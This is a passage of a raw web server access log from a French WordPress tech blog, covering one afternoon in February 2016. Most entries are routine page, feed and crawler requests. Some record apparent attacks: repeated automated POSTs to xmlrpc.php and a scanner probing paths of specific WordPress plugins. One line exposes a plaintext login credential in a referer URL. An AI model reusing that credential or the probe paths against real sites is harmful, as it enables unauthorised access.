Version/12.14\"\n62.210.250.66 - - [09/Feb/2016:15:26:32 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n88.171.181.51 - - [09/Feb/2016:15:28:16 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n88.171.181.51 - - [09/Feb/2016:15:28:16 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n62.210.250.66 - - [09/Feb/2016:15:29:52 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n130.0.236.153 - - [09/Feb/2016:15:34:49 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n162.243.175.172 - - [09/Feb/2016:15:35:44 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n2.1.201.36 - - [09/Feb/2016:15:36:22 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n130.0.236.153 - - [09/Feb/2016:15:40:41 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n92.137.217.224 - - [09/Feb/2016:15:43:01 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7663 \"https://www.google.fr/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n92.137.217.224 - - [09/Feb/2016:15:43:01 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"https://www.google.fr/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n92.137.217.224 - - [09/Feb/2016:15:43:01 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15527 \"https://www.google.fr/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n92.137.217.224 - - [09/Feb/2016:15:43:03 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n92.137.217.224 - - [09/Feb/2016:15:43:03 -0800] \"GET /wp-content/uploads/2014/04/tumblr_inline_n46um7CkZE1sa6hof-50x50.jpg HTTP/1.1\" 200 2424 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n92.137.217.224 - - [09/Feb/2016:15:43:03 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n92.137.217.224 - - [09/Feb/2016:15:43:04 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n46.127.16.228 - - [09/Feb/2016:15:43:19 -0800] \"GET /wp-content/uploads/2015/06/unnamed-300x225.jpg HTTP/1.1\" 200 25164 \"https://www.google.ch/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4\"\n62.210.250.66 - - [09/Feb/2016:15:45:02 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [09/Feb/2016:15:48:08 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [09/Feb/2016:15:51:08 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n199.30.24.94 - - [09/Feb/2016:15:53:22 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 382 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b\"\n130.0.236.153 - - [09/Feb/2016:15:55:57 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n66.249.69.143 - - [09/Feb/2016:15:59:48 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n130.0.236.153 - - [09/Feb/2016:16:01:43 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n198.58.102.158 - - [09/Feb/2016:16:06:15 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n130.0.236.153 - - [09/Feb/2016:16:07:35 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:16:10:32 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:16:13:23 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n91.121.65.46 - - [09/Feb/2016:16:15:27 -0800] \"GET /category/usa HTTP/1.1\" 301 408 \"-\" \"Mozilla/5.0 (compatible; Dazoobot/1.0; http://dazoo.fr)\"\n198.58.103.28 - - [09/Feb/2016:16:16:39 -0800] \"GET /rss HTTP/1.1\" 301 474 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n199.16.156.125 - - [09/Feb/2016:16:17:03 -0800] \"GET /post/98008044383/trouver-un-job-tech-a-san-francisco-ou-dans-la-silicon HTTP/1.1\" 301 318 \"-\" \"Twitterbot/1.0\"\n62.210.250.66 - - [09/Feb/2016:16:18:25 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n66.249.75.194 - - [09/Feb/2016:16:24:18 -0800] \"GET /robots.txt HTTP/1.1\" 200 423 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n74.91.28.58 - - [09/Feb/2016:16:21:19 -0800] \"GET / HTTP/1.1\" 200 20556 \"-\" \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\"\n62.210.250.66 - - [09/Feb/2016:16:27:29 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n130.0.236.153 - - [09/Feb/2016:16:31:24 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n198.58.102.95 - - [09/Feb/2016:16:36:19 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n213.180.206.196 - - [09/Feb/2016:16:38:24 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; YandexMetrika/2.0; +http://yandex.com/bots mtmon01g.yandex.ru)\"\n130.0.236.153 - - [09/Feb/2016:16:40:03 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n62.210.248.185 - - [09/Feb/2016:16:41:04 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:04 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:04 -0800] \"GET /wp-content/uploads/2015/03/UX-Basics-Workshop-50x50.jpg HTTP/1.1\" 200 2253 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:04 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [09/Feb/2016:16:41:05 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [09/Feb/2016:16:41:05 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [09/Feb/2016:16:41:05 -0800] \"GET /wp-content/uploads/2015/03/Photo-Bio-2013-300x300.jpg HTTP/1.1\" 200 24078 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [09/Feb/2016:16:41:05 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [09/Feb/2016:16:41:06 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [09/Feb/2016:16:41:06 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [09/Feb/2016:16:41:06 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 203835 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [09/Feb/2016:16:41:06 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1684 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [09/Feb/2016:16:41:08 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [09/Feb/2016:16:41:08 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [09/Feb/2016:16:41:09 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [09/Feb/2016:16:41:09 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [09/Feb/2016:16:41:10 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [09/Feb/2016:16:41:10 -0800] \"GET /wp-content/uploads/2015/03/teresa-colombi.png HTTP/1.1\" 200 39881 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [09/Feb/2016:16:41:10 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1684 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:12 -0800] \"GET /le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/ HTTP/1.1\" 200 9633 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:12 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:12 -0800] \"GET /wp-content/uploads/2014/04/tumblr_inline_n4pj44K9XI1sa6hof-50x50.jpg HTTP/1.1\" 200 2400 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:12 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:12 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:13 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:13 -0800] \"GET /wp-content/uploads/2015/02/tumblr_inline_nixmj1dBlt1sygmpd-50x50.jpg HTTP/1.1\" 200 2351 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:13 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:14 -0800] \"GET /le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/ HTTP/1.1\" 200 9021 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:14 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:14 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-50x50.jpg HTTP/1.1\" 200 2471 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:14 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [09/Feb/2016:16:41:15 -0800] \"GET /suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/ HTTP/1.1\" 200 7092 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [09/Feb/2016:16:41:15 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [09/Feb/2016:16:41:15 -0800] \"GET /wp-content/uploads/2015/02/avatar_0c3bab0c4ba4_1281-50x50.png HTTP/1.1\" 200 3414 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [09/Feb/2016:16:41:15 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:18 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:18 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:18 -0800] \"GET /wp-content/uploads/2015/02/photo-7.jpg HTTP/1.1\" 200 95455 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [09/Feb/2016:16:41:18 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n198.199.68.128 - - [09/Feb/2016:16:43:09 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n62.210.250.66 - - [09/Feb/2016:16:45:48 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n66.249.69.57 - - [09/Feb/2016:16:52:08 -0800] \"GET /raodath-aminou-la-revolution-du-commerce-est-en/ HTTP/1.1\" 200 9229 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n38.98.70.179 - - [09/Feb/2016:16:53:29 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857.jpg HTTP/1.1\" 200 2266560 \"-\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n38.98.70.179 - - [09/Feb/2016:16:53:47 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857.jpg HTTP/1.1\" 200 2266560 \"-\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n198.58.103.102 - - [09/Feb/2016:16:55:16 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n159.203.3.31 - - [09/Feb/2016:17:00:09 -0800] \"GET /wp-content/plugins/fast-image-adder/readme.txt HTTP/1.0\" 404 15541 \"-\" \"-\"\n159.203.3.31 - - [09/Feb/2016:17:00:17 -0800] \"GET /wp-content/plugins/dzs-zoomsounds/style/style.css HTTP/1.0\" 404 15541 \"-\" \"-\"\n159.203.3.31 - - [09/Feb/2016:17:00:22 -0800] \"GET /wp-content/plugins/videowhisper-video-conference-integration/readme.txt HTTP/1.0\" 404 15541 \"-\" \"-\"\n66.249.69.73 - - [09/Feb/2016:17:03:20 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 664 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n62.210.142.23 - jez [09/Feb/2016:17:06:07 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n40.77.167.6 - - [09/Feb/2016:17:07:22 -0800] \"GET /robots.txt HTTP/1.1\" 200 383 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.29 - - [09/Feb/2016:17:07:28 -0800] \"GET /julie-foulon-de-betagroup-fait-swinguer-la/ HTTP/1.1\" 200 9867 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.29 - - [09/Feb/2016:17:07:30 -0800] \"GET /author/phil/ HTTP/1.1\" 200 6634 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.29 - - [09/Feb/2016:17:07:32 -0800] \"GET /office-tour-de-rackspace-san-francisco-avec/ HTTP/1.1\" 200 8566 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n157.55.39.161 - - [09/Feb/2016:17:08:00 -0800] \"GET /category/europe/ HTTP/1.1\" 200 7368 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n157.55.39.161 - - [09/Feb/2016:17:08:01 -0800] \"GET /a-quoi-ca-sert-un-co-fondateur-non-technique/ HTTP/1.1\" 200 10081 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n157.55.39.161 - - [09/Feb/2016:17:08:02 -0800] \"GET /paul-duan-le-super-heros-de-la-data-science-pour/ HTTP/1.1\" 200 